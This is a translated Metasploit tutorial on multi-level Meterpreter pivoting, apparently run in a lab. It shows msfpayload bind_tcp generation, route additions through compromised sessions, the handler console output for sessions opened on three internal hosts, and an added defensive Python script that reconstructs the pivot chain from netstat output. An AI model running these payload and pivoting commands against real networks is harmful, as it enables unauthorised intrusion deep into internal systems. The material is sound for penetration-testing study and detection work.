Metasploit Penetration Tips: Post-Exploitation Meterpreter Proxying (Part 2)
With the proxy configured, test it with proxychains; here we access port 3389 on 10.1.1.129:
http://p35.qhimg.com/t01efa607a4afaa1950.jpg?size=690x568
As the screenshot shows, the access succeeds.
0×02 Multi-level proxies
1. Two-level proxy tunnel
The basic Meterpreter proxy method was introduced above, but some real environments cannot use it directly. Consider the following setup: two internal machines, A and B. A can connect outbound, but its access is tightly controlled and it can only reach a handful of internal machines; B cannot connect outbound, but can reach many core services and machines; A and B can reach each other. If we want to scan and access those core services and machines through B, what do we do?
In this case, combining Meterpreter pivots gives us a two-level proxy with little effort.
Diagram: attacker->xp-test1->xp-test2
Continuing from above, we already have a Meterpreter session called back from xp-test1; next we generate a bind (forward-connect) executable:
root@kali:~# msfpayload windows/meterpreter/bind_tcp RHOST=0.0.0.0 RPORT=4444 X > Rmeter.exe
[!] ************************************************************************
[!] * The utility msfpayload is deprecated!                                *
[!] * It will be removed on or about 2015-06-08                            *
[!] * Please use msfvenom instead                                          *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333    *
[!] ************************************************************************
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
 Length: 285
Options: {"RHOST"=>"0.0.0.0", "RPORT"=>"4444"}
Once generated, run it on xp-test2.
Then add a route in msf so that traffic for xp-test2 goes through the xp-test1 session (session 2):
msf exploit(handler) > route add 10.1.1.129 255.255.255.255 2
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.1.1.129         255.255.255.255    Session 2

Connect to the bind Meterpreter to obtain a session:
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(handler) > set RHOST 10.1.1.129
RHOST => 10.1.1.129
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     444              yes       The listen port
   RHOST     10.1.1.129       no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.1.1.129       no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > run
[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (770048 bytes)
[*] Meterpreter session 3 opened (192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444) at 2015-01-11 13:34:37 +0800
We now have a session on xp-test2; note that it was reached through the xp-test1 pivot.
To verify, check port 4444 on xp-test2:
C:\Documents and Settings\Administrator>netstat -an | find "4444"
  TCP    10.1.1.129:4444        10.1.1.128:1051        ESTABLISHED
The connection comes from xp-test1.
At this point the two-level proxy is in place. Add the IPs you need to reach to the routing table and, through the second-level session (session 3), you can use Metasploit's other modules to access or scan them.
2. Three-level or multi-level proxies
Sometimes an internal network is so large or complex that three or more proxy levels are needed. The principle is the same as for two levels: build the next connection on top of the second-level proxy.
Diagram: attacker->xp-test1->xp-test2->xp-test3->…..
This works much like the two-level proxy:
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                          Connection
  --  ----                   -----------                          ----------
  2   meterpreter x86/win32  XP-TEST1\Administrator @ XP-TEST1    192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)
  4   meterpreter x86/win32  XP-TEST2\Administrator @ XP-TEST2    192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)

msf exploit(handler) > route add 10.1.1.131 4
[-] Missing arguments to route add.
msf exploit(handler) > route add 10.1.1.131 255.255.255.255 4
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.1.1.129         255.255.255.255    Session 2
   10.1.1.131         255.255.255.255    Session 4

msf exploit(handler) > set RHOST=10.1.1.131
[-] Unknown variable
Usage: set

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore

msf exploit(handler) > set RHOST 10.1.1.131
RHOST => 10.1.1.131
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     10.1.1.131       no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > run
[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (770048 bytes)
[*] Meterpreter session 5 opened (192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444) at 2015-01-11 13:45:53 +0800

meterpreter > background
[*] Backgrounding session 5...
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                          Connection
  --  ----                   -----------                          ----------
  2   meterpreter x86/win32  XP-TEST1\Administrator @ XP-TEST1    192.168.101.105:444 -> 192.168.101.107:51205 (10.1.1.128)
  4   meterpreter x86/win32  XP-TEST2\Administrator @ XP-TEST2    192.168.101.105-192.168.101.107:0 -> 10.1.1.129:4444 (10.1.1.129)
  5   meterpreter x86/win32  XP-TEST3\Administrator @ XP-TEST3    192.168.101.105-_1_-192.168.101.107:0 -> 10.1.1.131:4444 (10.1.1.131)

Check the port connections on xp-test3:
C:\Documents and Settings\Administrator>netstat -an | find "4444"
  TCP    10.1.1.131:4444        10.1.1.129:1032        ESTABLISHED
Check port 4444 on xp-test2:
C:\Documents and Settings\Administrator>netstat -an | find "4444"
  TCP    10.1.1.129:1032        10.1.1.131:4444        ESTABLISHED
  TCP    10.1.1.129:4444        10.1.1.128:1054        ESTABLISHED
This confirms the three-level chain attacker->xp-test1->xp-test2->xp-test3.
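The netstat checks above are also what a defender gets to see: each pivot host carries an inbound ESTABLISHED connection on the bind port from the previous hop and an outbound connection to the next hop's bind port, and the first hop carries the reverse connection to the handler. The following added example (not from the original article) reconstructs the chain from per-host netstat output. The snapshots are constructed to match the article's netstat and session listings, the handler address 192.168.101.105 and port 4444 come from the article, and the assumption that every hop's netstat has been collected is mine.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed "netstat -an" excerpts, one per pivot host, modelled on the article's output.
# xp-test1 is dual-homed: 192.168.101.107 towards the attacker, 10.1.1.128 on the inside.
NETSTAT_SNAPSHOTS: Dict[str, str] = {
    "xp-test1": """
  TCP    192.168.101.107:51205  192.168.101.105:444   ESTABLISHED
  TCP    10.1.1.128:1054        10.1.1.129:4444       ESTABLISHED
""",
    "xp-test2": """
  TCP    10.1.1.129:1032        10.1.1.131:4444       ESTABLISHED
  TCP    10.1.1.129:4444        10.1.1.128:1054       ESTABLISHED
""",
    "xp-test3": """
  TCP    10.1.1.131:4444        10.1.1.129:1032       ESTABLISHED
""",
}

ATTACKER_IP = "192.168.101.105"  # handler address from the article's session list
SUSPECT_PORTS: Set[int] = {4444}  # bind-payload port used in the article

Conn = Tuple[str, int, str, int, str]
NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)\s*$")


def parse_netstat(text: str) -> List[Conn]:
    """Parse Windows 'netstat -an' TCP lines into (local_ip, local_port, remote_ip, remote_port, state)."""
    conns: List[Conn] = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            conns.append((m.group(1), int(m.group(2)), m.group(3), int(m.group(4)), m.group(5)))
    return conns


def ip_owner_map(snapshots: Dict[str, str]) -> Dict[str, str]:
    """Map every local address seen in a snapshot to its host, so dual-homed hosts are recognised."""
    owners: Dict[str, str] = {}
    for host, text in snapshots.items():
        for local_ip, *_ in parse_netstat(text):
            owners[local_ip] = host
    return owners


def pivot_edges(snapshots: Dict[str, str], suspect_ports: Set[int]) -> Set[Tuple[str, str]]:
    """Edges (controller -> controlled) between monitored hosts.

    With a bind payload the connecting side is the controller, so an ESTABLISHED
    connection whose remote port is a suspect bind port on another monitored host
    means "this host controls that host".
    """
    owners = ip_owner_map(snapshots)
    edges: Set[Tuple[str, str]] = set()
    for host, text in snapshots.items():
        for _local_ip, _local_port, remote_ip, remote_port, state in parse_netstat(text):
            if state != "ESTABLISHED" or remote_port not in suspect_ports:
                continue
            target = owners.get(remote_ip)
            if target and target != host:
                edges.add((host, target))
    return edges


def entry_hosts(snapshots: Dict[str, str], attacker_ip: str) -> List[str]:
    """Hosts with a direct ESTABLISHED connection to the external attacker address (the reverse hop)."""
    return sorted(
        host for host, text in snapshots.items()
        if any(r_ip == attacker_ip and st == "ESTABLISHED" for _, _, r_ip, _, st in parse_netstat(text))
    )


def reconstruct_chain(snapshots: Dict[str, str], attacker_ip: str, suspect_ports: Set[int]) -> List[str]:
    """Walk from the entry host along bind-payload edges; returns [] if no host talks to the attacker."""
    edges = pivot_edges(snapshots, suspect_ports)
    entries = entry_hosts(snapshots, attacker_ip)
    if not entries:
        return []
    chain = ["attacker"]
    current = entries[0]
    while current and current not in chain:  # the cycle check stops on malformed input
        chain.append(current)
        nxt = sorted(dst for src, dst in edges if src == current)
        current = nxt[0] if nxt else None
    return chain


if __name__ == "__main__":
    print(" -> ".join(reconstruct_chain(NETSTAT_SNAPSHOTS, ATTACKER_IP, SUSPECT_PORTS)))
```

The direction of a hop cannot be read from netstat alone (a bind payload is controlled by the connecting side, a reverse payload by the listening side), which is why the walk is seeded with the known handler address and then follows connections towards the bind port. Matching the remote address against every local address of every collected snapshot is what lets the walk cross the dual-homed first hop.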
0×03 Summary
Finally, every additional proxy level costs bandwidth and reduces stability. Choosing and applying the proxy method flexibly according to the real situation during a penetration test is what gets the most done with the least effort.